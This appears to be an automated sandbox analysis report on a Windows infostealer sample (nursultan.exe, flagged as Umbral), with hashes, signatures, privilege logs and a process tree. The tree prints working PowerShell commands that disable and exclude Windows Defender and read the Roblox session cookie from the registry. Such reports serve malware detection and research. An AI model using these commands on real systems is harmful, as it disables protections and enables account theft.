Analysis
-
max time kernel
121s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29-02-2024 13:21
Behavioral task
behavioral1
Sample
nursultan.exe
Resource
win7-20240221-en
General
-
Target
nursultan.exe
-
Size
231KB
-
MD5
0a40e097ff34f2786e6a1b1c2695db2d
-
SHA1
7701f374e627f5624ee7b792c777d2b59b41ac20
-
SHA256
a9e16fdb1ad53a73784a03803410b238e2de590eb1f7a1d6e4dfa0354ef99ca0
-
SHA512
3ed97fbbd49460b582c51059b7e96535a951820179e89492f16668d176c8bb33ebaf8f4e056e5e909fcda74167dfa71cd8f83db840b10fb084019ae675982c47
-
SSDEEP
6144:xloZMArIkd8g+EtXHkv/iD44gTVBPUonRWvRsY94Fb8e1mFrQi:DoZHL+EP84gTVBPUonRWvRsY9sOJ
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/memory/2544-0-0x0000000000020000-0x0000000000060000-memory.dmp family_umbral behavioral1/memory/2544-2-0x000000001A980000-0x000000001AA00000-memory.dmp family_umbral -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts nursultan.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 7 discord.com 8 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1648 wmic.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 584 powershell.exe 2716 powershell.exe 1528 powershell.exe 1744 powershell.exe 980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2544 nursultan.exe Token: SeDebugPrivilege 584 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 1744 powershell.exe Token: SeIncreaseQuotaPrivilege 2088 wmic.exe Token: SeSecurityPrivilege 2088 wmic.exe Token: SeTakeOwnershipPrivilege 2088 wmic.exe Token: SeLoadDriverPrivilege 2088 wmic.exe Token: SeSystemProfilePrivilege 2088 wmic.exe Token: SeSystemtimePrivilege 2088 wmic.exe Token: SeProfSingleProcessPrivilege 2088 wmic.exe Token: SeIncBasePriorityPrivilege 2088 wmic.exe Token: SeCreatePagefilePrivilege 2088 wmic.exe Token: SeBackupPrivilege 2088 wmic.exe Token: SeRestorePrivilege 2088 wmic.exe Token: SeShutdownPrivilege 2088 wmic.exe Token: SeDebugPrivilege 2088 wmic.exe Token: SeSystemEnvironmentPrivilege 2088 wmic.exe Token: SeRemoteShutdownPrivilege 2088 wmic.exe Token: SeUndockPrivilege 2088 wmic.exe Token: SeManageVolumePrivilege 2088 wmic.exe Token: 33 2088 wmic.exe Token: 34 2088 wmic.exe Token: 35 2088 wmic.exe Token: SeIncreaseQuotaPrivilege 2088 wmic.exe Token: SeSecurityPrivilege 2088 wmic.exe Token: SeTakeOwnershipPrivilege 2088 wmic.exe Token: SeLoadDriverPrivilege 2088 wmic.exe Token: SeSystemProfilePrivilege 2088 wmic.exe Token: SeSystemtimePrivilege 2088 wmic.exe Token: SeProfSingleProcessPrivilege 2088 wmic.exe Token: SeIncBasePriorityPrivilege 2088 wmic.exe Token: SeCreatePagefilePrivilege 2088 wmic.exe Token: SeBackupPrivilege 2088 wmic.exe Token: SeRestorePrivilege 2088 wmic.exe Token: SeShutdownPrivilege 2088 wmic.exe Token: SeDebugPrivilege 2088 wmic.exe Token: SeSystemEnvironmentPrivilege 2088 wmic.exe Token: SeRemoteShutdownPrivilege 2088 wmic.exe Token: SeUndockPrivilege 2088 wmic.exe Token: SeManageVolumePrivilege 2088 wmic.exe Token: 33 2088 wmic.exe Token: 34 2088 wmic.exe Token: 35 2088 wmic.exe Token: SeIncreaseQuotaPrivilege 700 wmic.exe Token: SeSecurityPrivilege 700 wmic.exe Token: SeTakeOwnershipPrivilege 700 wmic.exe Token: SeLoadDriverPrivilege 700 wmic.exe Token: SeSystemProfilePrivilege 700 wmic.exe Token: SeSystemtimePrivilege 700 wmic.exe Token: SeProfSingleProcessPrivilege 700 wmic.exe Token: SeIncBasePriorityPrivilege 700 wmic.exe Token: SeCreatePagefilePrivilege 700 wmic.exe Token: SeBackupPrivilege 700 wmic.exe Token: SeRestorePrivilege 700 wmic.exe Token: SeShutdownPrivilege 700 wmic.exe Token: SeDebugPrivilege 700 wmic.exe Token: SeSystemEnvironmentPrivilege 700 wmic.exe Token: SeRemoteShutdownPrivilege 700 wmic.exe Token: SeUndockPrivilege 700 wmic.exe Token: SeManageVolumePrivilege 700 wmic.exe Token: 33 700 wmic.exe Token: 34 700 wmic.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2544 wrote to memory of 584 2544 nursultan.exe 30 PID 2544 wrote to memory of 584 2544 nursultan.exe 30 PID 2544 wrote to memory of 584 2544 nursultan.exe 30 PID 2544 wrote to memory of 2716 2544 nursultan.exe 32 PID 2544 wrote to memory of 2716 2544 nursultan.exe 32 PID 2544 wrote to memory of 2716 2544 nursultan.exe 32 PID 2544 wrote to memory of 1528 2544 nursultan.exe 34 PID 2544 wrote to memory of 1528 2544 nursultan.exe 34 PID 2544 wrote to memory of 1528 2544 nursultan.exe 34 PID 2544 wrote to memory of 1744 2544 nursultan.exe 36 PID 2544 wrote to memory of 1744 2544 nursultan.exe 36 PID 2544 wrote to memory of 1744 2544 nursultan.exe 36 PID 2544 wrote to memory of 2088 2544 nursultan.exe 38 PID 2544 wrote to memory of 2088 2544 nursultan.exe 38 PID 2544 wrote to memory of 2088 2544 nursultan.exe 38 PID 2544 wrote to memory of 700 2544 nursultan.exe 41 PID 2544 wrote to memory of 700 2544 nursultan.exe 41 PID 2544 wrote to memory of 700 2544 nursultan.exe 41 PID 2544 wrote to memory of 1396 2544 nursultan.exe 43 PID 2544 wrote to memory of 1396 2544 nursultan.exe 43 PID 2544 wrote to memory of 1396 2544 nursultan.exe 43 PID 2544 wrote to memory of 980 2544 nursultan.exe 45 PID 2544 wrote to memory of 980 2544 nursultan.exe 45 PID 2544 wrote to memory of 980 2544 nursultan.exe 45 PID 2544 wrote to memory of 1648 2544 nursultan.exe 47 PID 2544 wrote to memory of 1648 2544 nursultan.exe 47 PID 2544 wrote to memory of 1648 2544 nursultan.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\nursultan.exe"C:\Users\Admin\AppData\Local\Temp\nursultan.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\nursultan.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:1396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:980
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1648
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57bda582a8c2d35c9f83f13a0d6dc9561
SHA1e274fca42eb7285c6dd9aeea4270f0b12f11df58
SHA2563d77c7d829e8849dd9aa6bf874de3e916fea04dfab3f0c38fbd01dcffe1def18
SHA5121d3c26bab1cb8b19371e3719b3dae555d855f166e96cb8bbfa3e9e36088a174eef523e413b6847b9dbce59e8d65aa0af48212d2e285405cb9850255ae0140a31